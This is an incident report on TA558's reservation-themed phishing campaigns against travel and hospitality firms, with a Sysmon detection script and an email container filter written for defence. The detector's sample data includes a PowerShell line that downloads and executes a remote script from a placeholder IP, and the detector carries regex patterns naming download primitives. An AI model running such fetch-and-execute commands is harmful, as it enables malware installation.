Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.
# Incident Report: TA558 Resurgence Targeting Travel and Hospitality with New File Formats
## Executive Summary
Long-standing threat group TA558 has sharply increased activity against the travel and hospitality sectors, timing its campaigns to the post-COVID travel rebound. The group has shifted delivery from macro-enabled or exploit-laden Office documents to ISO and RAR container files (usually fetched via a link in the lure) that carry a batch script; the script launches PowerShell, which downloads a RAT such as AsyncRAT. The primary risk is compromise of corporate systems and customer booking data by a financially motivated actor.
## Incident Details
- Discovery Date: Publicly documented by security researchers; the 2022 escalation was reported by Proofpoint.
- Incident Date: Activity ramped up significantly in 2022, building on campaigns dating back to 2018.
- Affected Organization: The travel and hospitality industries are the primary targets.
- Sector: Travel and Hospitality.
- Geography: Primarily Latin America, with activity also seen in North America and Western Europe.
## Timeline of Events
### Initial Access
- Date/Time: Increased activity noted in 2022, following a lull due to COVID restrictions.
- Vector: Socially engineered emails posing as travel or hotel reservations (subject lines often include "reserva"). In 2022 the lures increasingly carried a URL to an ISO or RAR container file rather than an Office attachment.
- Details: The victim follows the link, mounts the ISO (Windows presents it as a new drive letter) or extracts the RAR, and runs the embedded batch file (`.BAT`).
### Execution and Payload Delivery
- Details: The batch file launches a PowerShell helper script, which downloads the follow-on payload, identified as AsyncRAT. No lateral movement is documented in the reporting; the RAT gives the operator a foothold from which internal reconnaissance and movement become possible.
### Data Exfiltration/Impact
- Details: Payloads often included Remote Access Trojans (RATs) such as Loda, Revenge RAT, and AsyncRAT, enabling reconnaissance, data theft, and distribution of further payloads. The ultimate goal is financial gain derived from stolen data.
### Detection & Response
- Detection: Disclosures by security researchers (Proofpoint, Palo Alto Networks, Cisco Talos) tracking the group's evolution.
- Response Actions: No victim-specific response is described; organizations are advised to review the TTPs below and apply the detection and hardening measures in the Recommendations section.
## Attack Methodology
- Initial Access: Socially engineered emails carrying links to ISO images or RAR archives. Execution required user interaction: mounting the ISO or extracting the RAR, then running the embedded script.
- Persistence: Not detailed for the recent campaigns. AsyncRAT builds commonly persist through a scheduled task or a Run registry key, but the reporting does not confirm the mechanism used here.
- Privilege Escalation: Not detailed; the RAT runs with the privileges of the user who launched the batch file, and none of the named payloads is known for built-in escalation. The earlier campaigns' use of CVE-2017-11882 (Equation Editor) provided initial code execution, not elevation.
- Defense Evasion: The move from macro-enabled Office documents to ISO/RAR containers sidesteps Microsoft's 2022 change to block VBA macros in internet-sourced documents by default; files inside a mounted ISO also historically did not inherit Mark-of-the-Web, so SmartScreen and Protected View did not apply.
- Credential Access: Not observed directly; inferred from the capabilities of the deployed RATs (AsyncRAT ships keylogging and password-recovery plugins).
- Discovery: Not observed directly; available through the delivered RATs.
- Lateral Movement: Not observed; inferred from RAT capabilities.
- Collection: Data gathering enabled by RAT deployment.
- Exfiltration: Theft of booking and customer data over the RAT's C2 channel, for later monetization.
- Impact: RAT deployment enabling data theft and follow-on fraud; the RATs themselves are general-purpose tools, and the financial loss comes from what the operator does with the access.
## Impact Assessment
- Financial: High confidence that the actor is financially motivated; impact involves potential fraud or monetization of stolen data.
- Data Breach: Potential theft of organizational or customer data, especially concerning bookings and personal details within the travel sector.
- Operational: Can lead to system compromise and disruption due to RAT deployment.
- Reputational: Potential damage to targeted travel/hospitality organizations if customer data is exposed.
## Indicators of Compromise
- Network Indicators: URLs hosting ISO/RAR container files, used heavily in 2022. Specific domains are not reproduced here; consult the underlying vendor reporting.
- File Indicators: ISO images and RAR archives containing a batch file (`.BAT`), the PowerShell helper script it launches, and the downloaded RAT executable (e.g., AsyncRAT).
- Behavioral Indicators: cmd.exe launching a `.bat` from a newly mounted drive letter or an archive extraction folder and spawning PowerShell that downloads a payload; AsyncRAT C2 beaconing afterward.
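The behavioral indicators above (and the EDR recommendation later in this report) translate into a process-lineage rule. The following is an added example written for this report, not code from the vendor reporting or from any EDR product: it runs over Sysmon Event ID 1 (process creation) records represented as dictionaries. Field names follow Sysmon's schema, but every value in `SAMPLE_EVENTS` (paths, GUIDs, the 198.51.100.23 address) is constructed test data, not an indicator from the report.

```python
"""Detect the chain: cmd.exe runs a .bat from a mounted ISO or extracted
archive, then spawns PowerShell that fetches a payload.  Input is a list
of Sysmon Event ID 1 records as dicts, assumed to be in time order."""
import re

# Stage 1: cmd.exe invoked with a batch file.  Covers the explorer
# double-click form  cmd.exe /c ""E:\x.bat" "  and a plain  cmd.exe /c E:\x.bat
BAT_LAUNCH = re.compile(r'cmd\.exe.*?/c\s+"*([a-z]:\\[^"]+?\.bat)\b', re.I)

# Where a container-delivered script typically lives: the root of a
# non-system drive (a mounted ISO appears as a fresh drive letter) or a
# user download/temp/extraction folder.
SUSPICIOUS_PATH = re.compile(
    r'^(?:[d-z]:\\[^\\]+$|.*\\(?:downloads|temp|appdata\\local\\temp)\\)', re.I)

# Stage 2: download or obfuscation primitives in a PowerShell command line.
PS_DOWNLOAD = re.compile(
    r'downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient'
    r'|start-bitstransfer|-e(?:nc|ncodedcommand)?\s', re.I)


def detect_chain(events):
    """Return a list of alerts.  Rules:
      bat_from_container_path  cmd.exe ran a .bat from a suspicious path
      powershell_download      PowerShell with download primitives, no flagged parent
      chain_complete           PowerShell whose parent is a flagged cmd.exe (highest confidence)
    """
    alerts = []
    stage1 = {}  # ProcessGuid of flagged cmd.exe -> batch file path
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        image = ev.get("Image", "").lower()
        cmdline = ev.get("CommandLine", "")
        if image.endswith("\\cmd.exe"):
            m = BAT_LAUNCH.search(cmdline)
            if m and SUSPICIOUS_PATH.match(m.group(1)):
                stage1[ev["ProcessGuid"]] = m.group(1)
                alerts.append({"rule": "bat_from_container_path",
                               "guid": ev["ProcessGuid"], "detail": m.group(1)})
        elif image.endswith(("\\powershell.exe", "\\pwsh.exe")) and PS_DOWNLOAD.search(cmdline):
            parent = ev.get("ParentProcessGuid")
            if parent in stage1:
                alerts.append({"rule": "chain_complete", "guid": ev["ProcessGuid"],
                               "detail": f"{stage1[parent]} -> {cmdline}"})
            else:
                alerts.append({"rule": "powershell_download",
                               "guid": ev["ProcessGuid"], "detail": cmdline})
    return alerts


# Constructed sample: one malicious chain plus two benign look-alikes
# (a build agent running its own .bat, and an interactive PowerShell).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{cmd-0001}", "ParentProcessGuid": "{explorer-0001}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\System32\cmd.exe /c ""E:\Reserva.bat" "',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessGuid": "{ps-0001}", "ParentProcessGuid": "{cmd-0001}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.23/helper.ps1')\"",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "ProcessGuid": "{cmd-0002}", "ParentProcessGuid": "{svc-0001}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Program Files\BuildAgent\run.bat"',
     "ParentImage": r"C:\Program Files\BuildAgent\agent.exe"},
    {"EventID": 1, "ProcessGuid": "{ps-0002}", "ParentProcessGuid": "{explorer-0001}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_EVENTS):
        print(f"{alert['rule']:24} {alert['guid']:14} {alert['detail']}")
```

The parent/child correlation is what keeps this rule quiet: a build agent running its own batch file and an analyst's interactive PowerShell session produce no alert, while the same two events linked by `ParentProcessGuid` produce the high-confidence `chain_complete` alert. Sysmon does not log ISO mounts, so the drive-letter heuristic is a proxy; pairing it with Windows VHDMP or removable-media events would tighten it further.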
## Response Actions
- Containment: (Inferred based on detection) Isolating endpoints executing suspicious batch scripts/PowerShell, and blocking C2 traffic associated with AsyncRAT.
- Eradication: (Inferred) Removing all instances of the RAT, batch scripts, and any external access established by the threat actor.
- Recovery: (Inferred) Restoring affected systems from clean backups and enforcing credential rotation.
## Lessons Learned
- Phishing evolution is rapid: Threat actors quickly adapt delivery mechanisms (shifting from macros to ISO/RAR) to circumvent security controls (e.g., macro blocking).
- Targeted sector vulnerability: The travel and hospitality sectors remain consistent, high-value targets for this financially motivated group.
## Recommendations
- Implement email filtering that inspects ISO, RAR, and ZIP attachments by content rather than by extension alone, and that rewrites or sandboxes links whose target is such a file, especially from external senders purporting to confirm travel bookings.
- Tune endpoint detection and response (EDR) to alert on PowerShell spawned by cmd.exe running a batch file from a mounted ISO (a new drive letter) or an archive extraction folder, particularly when the command line contains download primitives (DownloadString, Invoke-WebRequest, encoded commands).
- Keep Microsoft Office fully patched, including against older bugs such as CVE-2017-11882 (Equation Editor) that TA558 exploited in earlier campaigns, even though current lures rely on social engineering rather than exploits.
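The first recommendation, inspecting containers by content, is illustrated by the added example below. It is written for this report and is not code from any mail gateway product: it parses a message with Python's standard `email` library, identifies ISO 9660 and RAR attachments from their file signatures (so an ISO renamed to `.pdf` is still caught), and extracts links whose target is a container. The sample message, its sender, domains and filenames are all constructed for illustration.

```python
"""Mail-filter check for container delivery: flag ISO/RAR attachments by
signature regardless of filename, and links pointing at such files."""
import re
from email import message_from_bytes
from email.message import EmailMessage
from email.policy import default

# RAR 1.5-4.x and RAR 5 signatures.  ISO 9660 carries the identifier "CD001"
# at byte 0x8001: sector 16 of 2048-byte sectors, one byte in.
RAR_MAGICS = (b"Rar!\x1a\x07\x00", b"Rar!\x1a\x07\x01\x00")
ISO_ID_OFFSET = 0x8001
CONTAINER_URL = re.compile(r"https?://[^\s\"'<>]+?\.(?:iso|rar|img)\b", re.I)


def container_type(data: bytes):
    """Identify ISO/RAR content from bytes, ignoring the filename entirely."""
    if data.startswith(RAR_MAGICS):
        return "rar"
    if len(data) >= ISO_ID_OFFSET + 5 and data[ISO_ID_OFFSET:ISO_ID_OFFSET + 5] == b"CD001":
        return "iso"
    return None


def scan_message(raw: bytes):
    """Return (where, kind, name) findings for container attachments and links."""
    msg = message_from_bytes(raw, policy=default)
    findings = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        filename = part.get_filename()
        if filename:
            kind = container_type(part.get_payload(decode=True) or b"")
            if kind:
                findings.append(("attachment", kind, filename))
        elif part.get_content_type() in ("text/plain", "text/html"):
            charset = part.get_content_charset() or "utf-8"
            body = (part.get_payload(decode=True) or b"").decode(charset, "replace")
            for url in CONTAINER_URL.findall(body):
                findings.append(("url", url.rsplit(".", 1)[1].lower(), url))
    return findings


def build_sample_message() -> bytes:
    """Constructed lure: a link to an ISO, an ISO renamed .pdf, a RAR, a real PDF."""
    msg = EmailMessage()
    msg["From"] = "reservas@hotel.example"
    msg["To"] = "frontdesk@resort.example"
    msg["Subject"] = "Reserva confirmada - 2291"
    msg.set_content("Detalles de la reserva: http://booking.example.net/reserva_2291.iso\nGracias.")
    fake_iso = b"\x00" * 0x8000 + b"\x01CD001\x01" + b"\x00" * 64   # minimal ISO 9660 header
    msg.add_attachment(fake_iso, maintype="application", subtype="octet-stream",
                       filename="reserva.pdf")          # container disguised by extension
    msg.add_attachment(RAR_MAGICS[1] + b"\x00" * 32, maintype="application",
                       subtype="octet-stream", filename="reserva.rar")
    msg.add_attachment(b"%PDF-1.4\n%benign\n", maintype="application", subtype="pdf",
                       filename="itinerary.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for where, kind, name in scan_message(build_sample_message()):
        print(f"{where:10} {kind:4} {name}")
```

Signature checks catch the renamed-extension trick but not nesting (an ISO inside a ZIP); a production filter would recurse into archives and apply the same test to each member. Links can only be flagged by their visible target here, so a URL that redirects to an ISO still needs time-of-click rewriting or detonation to be caught.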